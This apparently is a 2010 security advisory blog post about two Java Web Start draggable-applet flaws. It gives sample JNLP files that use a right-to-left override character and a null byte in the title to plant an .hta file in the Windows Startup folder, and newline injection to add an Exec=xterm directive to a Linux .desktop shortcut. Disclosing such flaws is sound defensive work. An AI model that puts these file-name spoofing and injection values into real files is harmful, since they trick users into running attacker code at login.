Monday, October 11, 2010

Java-JNLP-Applet User Assisted Arbitrary Execution

Summary
Java 6 update 10 plugin introduced several new features.

Among others there is the possibility to create an applet that will become a desktop applet by using JNLP in restricted environment.
This new feature is called draggable applets:

With Java SE 6 Update 10, Sun Microsystems, Inc. introduces a new paradigm for application deployment over the Internet: the ability to drag a live, running applet out of the web browser, dynamically transforming it into an application running on the desktop. The application can be re-launched later from a desktop shortcut or launch menu item using the standard JNLP and Java Web Start technologies. This capability is unique to the Java platform, and represents a complete unification of development and deployment in the web browser and on the desktop.


When an applet tag has

<param name="draggable" value="true">

it will become a jnlp Java application if a user simply click on it.

Depending on the JNLP it is also possible to ask the user to create a desktop shortcut of the applet.

17322757 ZERO TERMINATOR ALLOWS JNLP SHORTCUTS

Summary
It is possible to create arbitrary shortcut names leading to arbitrary code execution. Windows Only

Analysis
When the applet is dragged out of the HTML Java will read the JNLP file looking for some specific data.
Let's see an example:

<?xml version="1.0" encoding="utf-8"?>
<jnlp href="DragExample.jnlp">
<information>
<title>A Title/title>
<vendor>Sun Microsystems Java Update</vendor>
<homepage href="https://jdk6.dev.java.net/plugin2/"/>
<description kind="tooltip">a Description</description>
<offline-allowed/>
<shortcut online="false">
<menu submenu="Folder"/>
<desktop/>
</shortcut>
</information>
<resources>
<j2se href="http://java.sun.com/products/autodl/j2se" version="1.4+"/>
<jar href="DragExample.jar" main="true" />
</resources>
<applet-desc
name="Drag Example"
main-class="DragExample"
<!-- Currently used when relaunching from the desktop shortcut -->
width="200"
height="200">
</applet-desc>
</jnlp>


The interesting tags under windows are:
  • title: Title value will be used by Java to name the LNK file on desktop.
  • description kind="tooltip" : will be written by Java in the LNK Description Field and used as tooltip.
  • shortcut online="false": is the command which will instruct Java to ask user for allowing a desktop shortcut (It is asked when user closes the browser tab).
  • menu submenu="Folder": Will save the lnk also in the Startup Menu on Windows.
Putting all together we found that once a user allows the creation of the shortcut, is possible to create an arbitrary name with enough arbitrary content and have it executed on startup.
Example of a malicious jnlp file:

<?xml version="1.0" encoding="utf-8"?>
<jnlp href="DragExample.jnlp">
<information>
<title>Microsoft Updat&#x202eknl.hta&#x0000;e</title>
<vendor>Sun Microsystems Java Update</vendor>
<homepage href="https://jdk6.dev.java.net/plugin2/"/>
<description kind="tooltip"><![CDATA[><script>malicious Scriptable Shell code Here</script>]]></description>
<offline-allowed/>
<shortcut online="false">
<menu submenu="Startup"/>
<desktop/>
</shortcut>
</information>
<resources>
<j2se href="http://java.sun.com/products/autodl/j2se" version="1.4+"/>
<jar href="DragExample.jar" main="true" />
</resources>
<applet-desc
name="Drag Example"
main-class="DragExample"
<!-- Currently used when relaunching from the desktop shortcut -->
width="200"
height="200">
</applet-desc>
</jnlp>



what happens here is that:
  • User sees a request of Desktop shortcut named Microsoft Update.ath.lnk (because of 2025 special char)
  • title value contains a null byte. So when Java tries to write: TitleName.lnk will pass "Microsoft Update.hta\u0000"+".LNK" and Windows will write the filename Microsoft Update.hta on the desktop
  • The content somewhere in the file will be a malicious Scriptable Shell object
  • Finally it will be saved also in the Windows menu and in particular in the Startup Menu Folder, which contains files which are to be launched at Windows startup.
17322755 NEW LINES IN JNLP TITLE ARE COPIED INTO LNK FILES
This issue is somewhat similar to the Windows one.
Linux shortcut creation is a bit different from windows. It just creates a .desktop file containing 'ini' directives.
In the Linux case, an attacker can control the content of the file using for example the Title field.

The issue here is in the fact that new lines are allowed and copied in the desktop file, allowing the injection of new directives.
Example:

<title>test
Exec=xterm
Type=Application
[test]</title>


Once the user allows the creation of the desktop shortcut, the file will contain a new command to launch (xterm).
So when the victim will click on the shortcut he will execute the injected command in spite of the Java Web Start.

No comments :

Post a Comment